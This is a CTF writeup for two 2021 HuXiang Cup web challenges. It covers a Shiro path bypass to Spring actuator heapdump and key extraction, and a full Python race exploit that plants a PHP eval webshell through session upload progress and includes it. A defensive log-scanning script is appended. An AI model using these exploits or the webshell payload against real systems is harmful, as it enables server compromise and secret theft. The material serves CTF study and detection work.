2021 7th HuXiang Cup (湖湘杯) - web - writeup
Web2 Pentest in Autumn
The challenge attachment is a Pom.xml
Pom.xml pulls in actuator
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator
Common Spring Boot actuator endpoints (directly accessible in 1.x; under the actuator path in 2.x)
Without authorization, every request below returns 302
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator/health
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator/env
(information disclosure)
Shiro 1.5 authentication bypass, used to download files
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/aa/…/;test=/actuator/health
Download all of the files
Download the heapdump
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/aa/…/;test=/actuator/heapdump
Open the downloaded heapdump file with VisualVM
https://visualvm.github.io/download.html
Search the whole dump for org.apache.shiro.web.mgt.CookieRememberMeManager
Convert the byte values into the base64-form key
import base64
import struct

# The key is stored as 16 signed bytes in the heap dump (Java byte[] values);
# pack them as signed chars ('b') and base64-encode to get the Shiro form of the key.
res = base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb', 58, 5, 22, 5, 117, 45, -35, 82, -15, 62, -57, 117, -78, 15, 23, -89))
print(res)
(Reference: https://www.cnblogs.com/icez/p/Actuator_heapdump_exploit.html)
CB (CommonsBeanutils) chain, Spring echo
Web1 easywill
The challenge ships no source; following the description, fetch a copy of easywill V2.1.5 from the web (https://gitee.com/willphp/willphpv2/tree/808b3a36d366f66a88fd130cc6514c20eaf15450/)
On the index page, assign takes two controllable parameters; looking at the view function, they can overwrite the variable cfile
Try session file inclusion
Exp
# coding=utf-8
import io
import requests
import threading

sessid = 'flag'
data = {"cmd": "system('cat /ffffffff14ggggggg3');"}
url = "http://eci-2zec2ffu8ckzf0eggcpe.cloudeci1.ichunqiu.com/index.php"
event = threading.Event()


def write(session):
    # Keep uploading with PHP_SESSION_UPLOAD_PROGRESS set so that the session file
    # /tmp/sess_<sessid> briefly exists on disk with our payload inside it.
    while event.is_set():
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(url,
                     data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'},
                     files={'file': ('midi.txt', f)}, cookies={'PHPSESSID': sessid})


def read(session):
    # Race the cleanup: include the session file through the overwritten cfile variable.
    while event.is_set():
        resp = session.post(url + '?name=cfile&value=/tmp/sess_' + sessid, data=data)
        if 'midi.txt' in resp.text:
            print(resp.text)
            event.clear()  # hit: stop all threads


if __name__ == "__main__":
    event.set()
    with requests.session() as session:
        threads = []
        for i in range(1, 30):
            threads.append(threading.Thread(target=write, args=(session,)))
        for i in range(1, 30):
            threads.append(threading.Thread(target=read, args=(session,)))
        for t in threads:
            t.start()
        for t in threads:
            t.join()  # keep the session open until the race is won
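As an added, defender-side example (not part of the writeup), the following Python scans access-log lines for the two request shapes used above: the Shiro path-parameter/traversal bypass that reaches /actuator (and a heapdump that was actually served), and a session file path passed in a request parameter. The log lines are constructed, and normalize_path only approximates how the servlet container strips ';' path parameters and resolves '..'.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format), not from the challenge host.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Nov/2021:10:01:02 +0800] "GET /actuator/health HTTP/1.1" 302 0
10.0.0.5 - - [12/Nov/2021:10:01:09 +0800] "GET /aa/../;test=/actuator/health HTTP/1.1" 200 15
10.0.0.5 - - [12/Nov/2021:10:01:31 +0800] "GET /aa/../;test=/actuator/heapdump HTTP/1.1" 200 48213000
10.0.0.7 - - [12/Nov/2021:10:02:00 +0800] "POST /index.php?name=cfile&value=/tmp/sess_flag HTTP/1.1" 200 512
10.0.0.9 - - [12/Nov/2021:10:03:00 +0800] "GET /static/app.js HTTP/1.1" 200 2048
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) (?P<size>\d+)')

def normalize_path(raw_target):
    """Approximate the path the container dispatches: drop the query string,
    strip ';param' matrix parameters from every segment, then resolve '.' and '..'."""
    path = unquote(raw_target.split('?', 1)[0])
    out = []
    for seg in path.split('/'):
        seg = seg.split(';', 1)[0]
        if seg in ('', '.'):
            continue
        if seg == '..':
            if out:
                out.pop()
            continue
        out.append(seg)
    return '/' + '/'.join(out)

def flag_request(line):
    """Return (ip, raw_target, normalized_path, reasons) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw = m.group('target')
    raw_path = raw.split('?', 1)[0]
    norm = normalize_path(raw)
    reasons = []
    # A plain /actuator request is ordinary traffic; the same target reached through '..'
    # or ';' segments is the filter-bypass shape, so only that combination is flagged.
    if norm.startswith('/actuator') and ('..' in raw_path or ';' in raw_path):
        reasons.append('actuator reached through path-parameter/traversal obfuscation')
    if norm == '/actuator/heapdump' and m.group('status') == '200':
        reasons.append('heapdump served (holds in-memory secrets such as the Shiro key)')
    if 'sess_' in unquote(raw):
        reasons.append('session file path supplied in a request parameter')
    return (m.group('ip'), raw, norm, reasons) if reasons else None

def scan(log_text):
    return [hit for hit in (flag_request(l) for l in log_text.splitlines()) if hit]
```

scan(SAMPLE_LOG) returns three hits: the two obfuscated actuator requests (the heapdump one with two reasons) and the sess_ inclusion attempt; the direct 302 probe and the static asset are not flagged.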